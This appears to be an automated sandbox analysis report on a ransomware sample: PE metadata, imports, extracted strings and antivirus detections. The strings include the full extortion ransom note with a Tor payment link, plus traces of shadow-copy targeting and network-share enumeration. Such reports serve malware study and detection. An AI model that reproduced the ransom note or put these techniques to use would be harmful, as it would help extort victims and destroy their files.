
PE Compile Time

2022-10-02 18:53:28

PE Imphash

0ca311d567c0202f7a711f8080ed1bbf

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00011e8f 0x00012000 6.62278115501
.rdata 0x00013000 0x000062a0 0x00006400 4.84743809652
.data 0x0001a000 0x00001f14 0x00000e00 3.21122681876
.reloc 0x0001c000 0x00001108 0x00001200 6.45957644813

Imports

Library SHLWAPI.dll:
0x4131bc wnsprintfW
0x4131c0 StrStrIW
Library MPR.dll:
0x413184 WNetCloseEnum
0x413188 WNetAddConnection2W
0x41318c WNetOpenEnumW
0x413190 WNetGetConnectionW
0x413194 WNetEnumResourceW
Library RstrtMgr.DLL:
0x4131a8 RmStartSession
0x4131ac RmEndSession
0x4131b0 RmRegisterResources
0x4131b4 RmGetList
Library KERNEL32.dll:
0x413010 LCMapStringW
0x413014 GetStringTypeW
0x413018 GetFileType
0x41301c ReadFile
0x413020 WriteFile
0x413024 TerminateProcess
0x413028 WaitForSingleObject
0x41302c CreateFileW
0x413030 OpenProcess
0x413034 SetFileAttributesW
0x413038 CloseHandle
0x41303c SetFilePointerEx
0x413040 GetFileSize
0x413044 GetCurrentProcessId
0x413048 GetLogicalDrives
0x41304c FindFirstFileW
0x413050 FindFirstVolumeW
0x413054 HeapFree
0x413058 FindNextFileW
0x41305c GetCurrentProcess
0x413060 lstrlenW
0x413068 lstrlenA
0x41306c FindClose
0x413070 GetModuleHandleA
0x413074 Sleep
0x413078 lstrcatW
0x41307c CreateThread
0x413080 HeapAlloc
0x413088 GetProcAddress
0x41308c FindVolumeClose
0x413090 GetProcessHeap
0x413098 lstrcpyW
0x41309c FindNextVolumeW
0x4130a0 lstrcmpiW
0x4130a4 GetTickCount
0x4130a8 lstrcmpW
0x4130ac MoveFileW
0x4130b0 GetDriveTypeW
0x4130b8 ReleaseSemaphore
0x4130c8 CreateSemaphoreW
0x4130cc SetStdHandle
0x4130d0 GetConsoleMode
0x4130d4 WriteConsoleW
0x4130d8 DecodePointer
0x4130dc HeapSize
0x4130e0 SetThreadPriority
0x4130e4 GetConsoleCP
0x4130e8 FlushFileBuffers
0x4130f4 WideCharToMultiByte
0x413108 GetCurrentThreadId
0x413110 InitializeSListHead
0x413114 IsDebuggerPresent
0x413118 GetStartupInfoW
0x41311c GetModuleHandleW
0x413120 RtlUnwind
0x413124 GetLastError
0x413128 SetLastError
0x413130 TlsAlloc
0x413134 TlsGetValue
0x413138 TlsSetValue
0x41313c TlsFree
0x413140 FreeLibrary
0x413144 LoadLibraryExW
0x413148 RaiseException
0x41314c GetStdHandle
0x413150 GetModuleFileNameW
0x413154 ExitProcess
0x413158 GetModuleHandleExW
0x41315c FindFirstFileExW
0x413160 IsValidCodePage
0x413164 GetACP
0x413168 GetOEMCP
0x41316c GetCPInfo
0x413170 GetCommandLineA
0x413174 GetCommandLineW
0x413178 MultiByteToWideChar
0x41317c HeapReAlloc
Library USER32.dll:
0x4131c8 wsprintfA
0x4131cc wsprintfW
Library ADVAPI32.dll:
0x413004 CryptReleaseContext
0x413008 CryptGenRandom
Library ole32.dll:
0x4131d4 CoCreateInstance
0x4131d8 CoSetProxyBlanket
Library OLEAUT32.dll:
0x41319c VariantInit
0x4131a0 VariantClear

!This program cannot be run in DOS mode.
Gd'uDev
Gd'uBe
Gd'uCen
Gd'uFem
Gd'uAe}
GdRich|
`.rdata
@.data
.reloc
D$$;|$
G@expa
GDnd 3
GH2-by
GLte k
9"F#3O
Genuu?
ntelu7=ineIu0
=cAMDt
Hygou}
uineuu=nGenun
D$| ~A
D$$Pjx
D$9#D$$
D$$PhP2A
SVWQPj
t/hx2A
URPQQh
;t$,v-
UQPXY]Y[
YYh$2A
zSSSSj
f9:t!V
QQSVj8j@
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
expand 32-byte k
expand 16-byte k
Microsoft Hv
IsWow64Process
kernel32.dll
ZZZZZZZZD3"
.text$mn
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
StrStrIW
wnsprintfW
SHLWAPI.dll
WNetCloseEnum
WNetGetConnectionW
WNetEnumResourceW
WNetAddConnection2W
WNetOpenEnumW
MPR.dll
RmRegisterResources
RmGetList
RmStartSession
RmEndSession
RstrtMgr.DLL
ReadFile
WriteFile
TerminateProcess
WaitForSingleObject
CreateFileW
OpenProcess
SetFileAttributesW
CloseHandle
SetFilePointerEx
GetFileSize
GetCurrentProcessId
GetLogicalDrives
FindFirstFileW
FindFirstVolumeW
HeapFree
FindNextFileW
GetCurrentProcess
lstrlenW
WaitForMultipleObjects
SetThreadPriority
lstrlenA
FindClose
GetModuleHandleA
lstrcatW
CreateThread
HeapAlloc
SetVolumeMountPointW
GetProcAddress
FindVolumeClose
GetProcessHeap
GetVolumePathNamesForVolumeNameW
lstrcpyW
FindNextVolumeW
lstrcmpiW
GetTickCount
lstrcmpW
MoveFileW
GetDriveTypeW
EnterCriticalSection
ReleaseSemaphore
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
CreateSemaphoreW
KERNEL32.dll
wsprintfW
wsprintfA
USER32.dll
CryptReleaseContext
CryptGenRandom
CryptAcquireContextA
ADVAPI32.dll
CoCreateInstance
CoSetProxyBlanket
ole32.dll
OLEAUT32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwind
GetLastError
SetLastError
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
RaiseException
GetStdHandle
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetFileType
GetStringTypeW
LCMapStringW
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleCP
GetConsoleMode
WriteConsoleW
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
W3CRYPTO LOCKER
Attention!
All your files, documents, photos, databases and other important files are encrypted
The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files.
The server with your decryptor is in a closed network TOR. You can get there by the following ways:
----------------------------------------------------------------------------------------
1. Download Tor browser - https://www.torproject.org/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://34vm2smykaqtzzzm4bgycfzg5fwyhhksrkpahdbiswmmuwuu7hmvuvqd.onion/?502%s
5. and open ticket
----------------------------------------------------------------------------------------
Alternate communication channel here: https://yip.su/2QstD5
expand 32-byte k
626T6f6u6~6
707N7c7
8,8^8w8
=!='=A=G=a=g=
?.?A?G?M?V?`?
4*868=8P8c8p8|8
9*949@9L9^9n9z9
:&:1:C:R:^:m:
;";*;2;:;B;J;R;];h;s;~;
= =&=?=b=
>">(>:>B>H>n>x>
?^?t?~?
0)0/090B0Q0V0d0k0q0
1=1W1f1
3+343`3g3
4%4+4D4X4]4c4j4
6@6G6f6s6
7 74797?7F7b7w7}7
8%8+80868;8F8K8R8\8b8l8r8
9/9E9N9Y9`9
:+:;:K:T:
:';R;g;l;q;
?'?4?J?
2,2@2E2X2q2
4>4G4P4^4g4
9!9>:E:k:p:
;;G;[;w;
<"<(<L<U<
<6=S=_=
>#>K>f>k>p>
?!???I?U?Z?_?
8,;4;;;
>.>5>=>U>c>k>
303K3[3`3j3o3z3
5%5*565;5O5
6%676K6S6]6f6w6
6A7N7g7l7u7
=H>S>D?J?\?
0.1?1J1z1
3k4F5M5{5
626P6w6
6#787J7W7p7
2E3L3S3Z3t3
4B4j4Z6
6&7r7{7
=#=>=E=
?!?7?r?y?
1!1U1x1
2)2;2M2_2q2
3"343F3X3
8P9f9k9p9
::5:[:
;+;O;c;h;m;
< <%<*<H<W<b<g<l<
=5=:=E=l=~=
?Q?o?z?
L0Q0V0[0m0-1
5"505<5H5V5f5{5
575h5n5
:<:]:h:v:
;2;Q;c;m;
=,=S=r=.>^>x>
1L1m1t1
2W3i3{3
<*<0<><q<
=/>4>y>
>!?-?A?M?Y?y?
00+0:0M1~1
5&5{5|6
6-787>7G7
8#8l8u8~8
:-;L;};
>$>:>P>X>
2p2t2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
5 <$<(<
> >$>(>,>4>8><>@>D>H>L>P>\>d>l>p>t>x>|>
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1 1$1(1,1014181<1@1D1H1
; ;$;(;,;0;4;8;<;
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888
J2N2R2V2L;T;\;d;l;t;|;
<$<,<$=(=,=0=4=8=
4 4<4@4\4`4|4
5 5<5@5`5
6 6@6`6
7 7@7`7|7
1H6L6P6T6X6\6`6d6h6l6x6|6
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
Aja-JP
((((( H
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
Windows
ProgramData
$Recycle.bin
System Volume Information
\\?\%c:
%ls\%ls
ReadMe.txt
%ls%ls
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.ID='%s'
Antivirus Signatures
Bkav Clean
Lionic Trojan.Win32.Gen.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Heur.Mint.SP.Ransomware.1
ClamAV Win.Ransomware.DeathRansom-9866362-1
FireEye Generic.mg.842d42bb052a7775
CAT-QuickHeal Trojan.GenericRI.S16459571
ALYac Gen:Heur.Mint.SP.Ransomware.1
Cylance Unsafe
VIPRE Gen:Heur.Mint.SP.Ransomware.1
Sangfor Trojan.Win32.Save.a
K7AntiVirus Ransomware ( 005957b11 )
BitDefender Gen:Heur.Mint.SP.Ransomware.1
K7GW Ransomware ( 005957b11 )
Cybereason malicious.b052a7
Baidu Clean
VirIT Clean
Cyren W32/Injector.BBB.gen!Eldorado
Symantec Ransom.Cryptolocker
tehtris Clean
ESET-NOD32 a variant of Win32/Filecoder.OCP
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Ransom.Win32.Generic
Alibaba Clean
NANO-Antivirus Trojan.Win32.Filecoder.hngtyg
ViRobot Clean
Rising Trojan.Filecoder!8.68 (TFE:5:vS4hrXmF9DB)
Ad-Aware Gen:Heur.Mint.SP.Ransomware.1
TACHYON Ransom/W32.BitRansomware.108544
Sophos Mal/Generic-S
Comodo Clean
F-Secure Heuristic.HEUR/AGEN.1213034
DrWeb Trojan.Encoder.32178
Zillya Trojan.Filecoder.Win32.22595
TrendMicro Ransom.Win32.CRYPTOLOCK.SM
McAfee-GW-Edition BehavesLike.Win32.NetLoader.ch
Trapmine Clean
CMC Clean
Emsisoft Trojan.FileCoder (A)
SentinelOne Clean
GData Gen:Heur.Mint.SP.Ransomware.1
Jiangmin Trojan.Gen.bea
Webroot Clean
Avira HEUR/AGEN.1213034
Antiy-AVL Trojan/Win32.Wacatac
Kingsoft Clean
Gridinsoft Ransom.Win32.DeathRansom.oa!s1
Arcabit Trojan.Mint.SP.Ransomware.1
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Ransom.Win32.Gen.gen
Microsoft Trojan:Win32/Synder0s18.s18!ic
Google Detected
AhnLab-V3 Trojan/Win32.RansomCrypt.R343432
Acronis Clean
McAfee GenericRXLK-YJ!842D42BB052A
MAX malware (ai score=88)
VBA32 BScope.TrojanRansom.Gen
Malwarebytes Ransom.FileCryptor
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Ransom.Win32.CRYPTOLOCK.SM
Tencent Malware.Win32.Gencirc.115daddd
Yandex Trojan.Filecoder!K3ePO8ZFcEM
Ikarus Trojan-Ransom.FileCrypter
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Filecoder.E499!tr.ransom
BitDefenderTheta Gen:NN.ZexaF.36106.gqW@aSLGXEk
AVG Win32:Malware-gen
Avast Win32:Malware-gen
No IRMA results available.